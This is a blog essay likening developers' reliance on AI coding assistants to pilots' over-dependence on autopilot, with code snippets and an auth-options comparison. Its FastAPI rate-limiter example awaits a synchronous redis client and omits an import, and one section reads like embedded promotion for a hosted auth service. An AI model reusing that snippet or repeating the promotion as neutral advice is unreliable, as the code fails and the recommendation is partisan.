<p>We're living through the exact same transition in software engineering right now. AI coding assistants are our autopilot, and most of us haven't thought about what happens when we need to hand-fly.</p>
<h2 id="heading-the-aviation-parallel-children-of-the-magenta">The Aviation Parallel: Children of the Magenta</h2>
<p>In pilot training, there's a famous concept called "Children of the Magenta" — a reference to the magenta-colored flight director lines on cockpit displays. Some pilots become so dependent on following those magenta lines that when the automation disengages, they freeze. They've lost the instinct to scan instruments, interpret raw data, and make manual corrections.</p>
<p>Aviation solved this problem roughly 30 years ago with a framework that's surprisingly applicable to us:</p>
<ul>
<li><strong>Mandatory manual flying hours</strong> — Pilots must regularly hand-fly to maintain proficiency</li>
<li><strong>Automation level awareness</strong> — Pilots are trained to know exactly which systems are active and what they're doing</li>
<li><strong>Graduated automation</strong> — Use the minimum level of automation needed for the situation</li>
<li><strong>Takeover drills</strong> — Regular practice switching from autopilot to manual control under stress</li>
</ul>
<p>Sound familiar? It should. Because right now, the average developer using Copilot or Cursor or Claude Code has none of these safeguards in place.</p>
<h2 id="heading-two-approaches-to-ai-assisted-development">Two Approaches to AI-Assisted Development</h2>
<p>Let's make this concrete. I see two distinct approaches emerging in how developers use AI tools, and the difference matters more than most people realize.</p>
<h3 id="heading-approach-a-full-autopilot-vibe-coding">Approach A: Full Autopilot ("Vibe Coding")</h3>
<p>You describe what you want in natural language, the AI generates entire files, you accept the suggestions, maybe glance at the output, ship it.</p>
<pre><code class="lang-python"><span class="hljs-comment"># You type a prompt like:</span>
<span class="hljs-comment"># "Create a FastAPI endpoint that handles user registration </span>
<span class="hljs-comment">#  with email verification and rate limiting"</span>

<span class="hljs-comment"># The AI generates 200 lines of code.</span>
<span class="hljs-comment"># You hit "Accept All" and move on.</span>
<span class="hljs-comment"># You probably didn't notice it's storing the verification </span>
<span class="hljs-comment"># token in plain text, or that the rate limiter </span>
<span class="hljs-comment"># resets on server restart because it's in-memory.</span>
</code></pre>
<p>This is the Children of the Magenta approach. It works great — until it doesn't. And when it doesn't, you're staring at code you don't fully understand, trying to debug logic someone else (something else?) wrote.</p>
<h3 id="heading-approach-b-graduated-automation-pilot-in-command">Approach B: Graduated Automation ("Pilot in Command")</h3>
<p>You write the architecture yourself. You use AI for the tedious parts — boilerplate, test scaffolding, repetitive CRUD. But you understand every line that ships.</p>
<pre><code class="lang-python"><span class="hljs-comment"># You architect the endpoint yourself:</span>
<span class="hljs-keyword">from</span> fastapi <span class="hljs-keyword">import</span> FastAPI, Depends, HTTPException
<span class="hljs-keyword">from</span> fastapi.security <span class="hljs-keyword">import</span> OAuth2PasswordBearer
<span class="hljs-keyword">from</span> redis <span class="hljs-keyword">import</span> Redis  <span class="hljs-comment"># you chose Redis deliberately for distributed rate limiting</span>

redis_client = Redis.from_url(settings.REDIS_URL)

<span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">check_rate_limit</span>(<span class="hljs-params">request: Request</span>):</span>
    client_ip = request.client.host
    key = <span class="hljs-string">f"register:<span class="hljs-subst">{client_ip}</span>"</span>
    current = <span class="hljs-keyword">await</span> redis_client.incr(key)
    <span class="hljs-keyword">if</span> current == <span class="hljs-number">1</span>:
        <span class="hljs-keyword">await</span> redis_client.expire(key, <span class="hljs-number">3600</span>)  <span class="hljs-comment"># 1 hour window</span>
    <span class="hljs-keyword">if</span> current &gt; <span class="hljs-number">5</span>:  <span class="hljs-comment"># max 5 registration attempts per hour</span>
        <span class="hljs-keyword">raise</span> HTTPException(status_code=<span class="hljs-number">429</span>, detail=<span class="hljs-string">"Too many attempts"</span>)

<span class="hljs-comment"># THEN you let AI help fill in the email verification logic,</span>
<span class="hljs-comment"># the input validation schemas, the test fixtures.</span>
<span class="hljs-comment"># You review every line because you understand the intent.</span>
</code></pre>
<p>The difference isn't productivity — both approaches ship features. The difference is what happens six months later when that rate limiter needs to handle a distributed deployment, or when the email verification flow has a subtle race condition.</p>
<h2 id="heading-where-this-gets-real-authentication">Where This Gets Real: Authentication</h2>
<p>Authentication is actually a perfect case study for this autopilot vs. manual control debate. It's complex enough that getting it wrong has real consequences, but common enough that AI tools will confidently generate auth code that looks correct.</p>
<p>I've seen AI assistants generate JWT implementations with hardcoded secrets, session management without proper invalidation, and OAuth flows that skip the state parameter (hello, CSRF). The code compiles. The tests pass. The security holes are invisible unless you know what to look for.</p>
<p>This is where the "graduated automation" philosophy gets interesting. Instead of writing auth from scratch (manual flying) or blindly accepting AI-generated auth code (full autopilot), you pick the right level of automation for the risk.</p>
<p>Here's what that spectrum looks like for auth:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Approach</td><td>Automation Level</td><td>Risk</td><td>When to Use</td></tr>
</thead>
<tbody>
<tr>
<td>Roll your own</td><td>None (hand-flying)</td><td>High — you'll miss edge cases</td><td>Almost never in production</td></tr>
<tr>
<td>AI-generated auth</td><td>High autopilot</td><td>High — AI misses security nuances</td><td>Prototyping only</td></tr>
<tr>
<td>Auth library (passport.js, etc.)</td><td>Medium automation</td><td>Medium — you still configure it</td><td>When you need deep customization</td></tr>
<tr>
<td>Hosted auth service</td><td>Full managed</td><td>Low — security is their problem</td><td>Most production apps</td></tr>
</tbody>
</table>
</div><p>For hosted auth, the market has a few solid options. <a target="_blank" href="https://auth0.com">Auth0</a> is the incumbent — mature, well-documented, but the pricing can surprise you as you scale. <a target="_blank" href="https://clerk.com">Clerk</a> is developer-friendly with great React components, though you're fairly locked into their ecosystem.</p>
<p>A newer option worth looking at is <a target="_blank" href="https://authon.dev">Authon</a>, which takes a different angle. It's a hosted auth service with 15 SDKs across 6 languages and 10+ OAuth providers. The pricing model stands out: unlimited users on the free plan with no per-user pricing, which eliminates the cost anxiety that kicks in when your Auth0 bill starts climbing. It also offers compatibility with Clerk and Auth0 APIs, which means migration is less painful than usual.</p>
<p>To be fair about tradeoffs: Authon doesn't offer SSO via SAML/LDAP yet (it's planned), and custom domains aren't available yet either. Self-hosting is on the roadmap but not shipping today. If you need enterprise SSO right now, Auth0 is still your best bet. But for startups and mid-size apps where per-user pricing is the pain point, it's a compelling alternative.</p>
<pre><code class="lang-javascript"><span class="hljs-comment">// Migrating from Auth0 to Authon is relatively straightforward</span>
<span class="hljs-comment">// given the API compatibility layer</span>

<span class="hljs-comment">// Before (Auth0)</span>
<span class="hljs-keyword">import</span> { Auth0Client } <span class="hljs-keyword">from</span> <span class="hljs-string">'@auth0/auth0-spa-js'</span>;
<span class="hljs-keyword">const</span> auth0 = <span class="hljs-keyword">new</span> Auth0Client({
  <span class="hljs-attr">domain</span>: <span class="hljs-string">'your-app.auth0.com'</span>,
  <span class="hljs-attr">clientId</span>: <span class="hljs-string">'your-client-id'</span>
});

<span class="hljs-comment">// After (Authon) — similar patterns, different provider</span>
<span class="hljs-keyword">import</span> { AuthonClient } <span class="hljs-keyword">from</span> <span class="hljs-string">'@authon/sdk'</span>;
<span class="hljs-keyword">const</span> authon = <span class="hljs-keyword">new</span> AuthonClient({
  <span class="hljs-attr">appId</span>: <span class="hljs-string">'your-app-id'</span>,
  <span class="hljs-comment">// No per-user pricing means you stop worrying </span>
  <span class="hljs-comment">// about the billing page at 10k users</span>
});
</code></pre>
<h2 id="heading-building-your-own-manual-flying-practice">Building Your Own "Manual Flying" Practice</h2>
<p>So how do you apply aviation's lessons? Here's what I've started doing:</p>
<p><strong>1. Designate "no-AI" coding sessions.</strong> Once a week, I write code without any AI assistance. It's humbling. It's slower. It's also the only way I've found to keep my debugging instincts sharp.</p>
<p><strong>2. Always read before accepting.</strong> Treat AI suggestions like a pull request from a junior developer who's very fast but doesn't understand your system's constraints. Review everything.</p>
<p><strong>3. Use graduated automation deliberately.</strong></p>
<ul>
<li><strong>No automation:</strong> Core business logic, security-critical paths</li>
<li><strong>Light automation (completions):</strong> Boilerplate, test scaffolding, documentation</li>
<li><strong>Heavy automation (generation):</strong> Prototypes, throwaway scripts, exploration</li>
</ul>
<p><strong>4. Practice "takeover drills."</strong> Take a piece of AI-generated code you're using in production and rewrite it from scratch. If you can't, that's a red flag — you're shipping code you don't understand.</p>
<p><strong>5. Know your automation level.</strong> At any given moment, be conscious of how much you're relying on AI. Are you driving, or are you a passenger?</p>
<h2 id="heading-the-uncomfortable-truth">The Uncomfortable Truth</h2>
<p>Aviation didn't solve the automation problem by rejecting autopilot. Planes are safer than ever, and autopilot is a huge part of that. They solved it by developing a rigorous framework for <em>when</em> to use automation, <em>how much</em> to use, and <em>how</em> to maintain manual skills alongside it.</p>
<p>We need the same thing for software engineering. AI coding tools aren't going away — nor should they. But if your response to every coding challenge is to describe it in a prompt and accept whatever comes back, you're becoming a Child of the Magenta.</p>
<p>The developers who thrive in the AI era won't be the ones who use AI the most, or the ones who refuse to use it at all. They'll be the ones who know exactly when to engage the autopilot and when to hand-fly.</p>
<p>And they'll practice both.</p>
]]></content:encoded></item></channel></rss>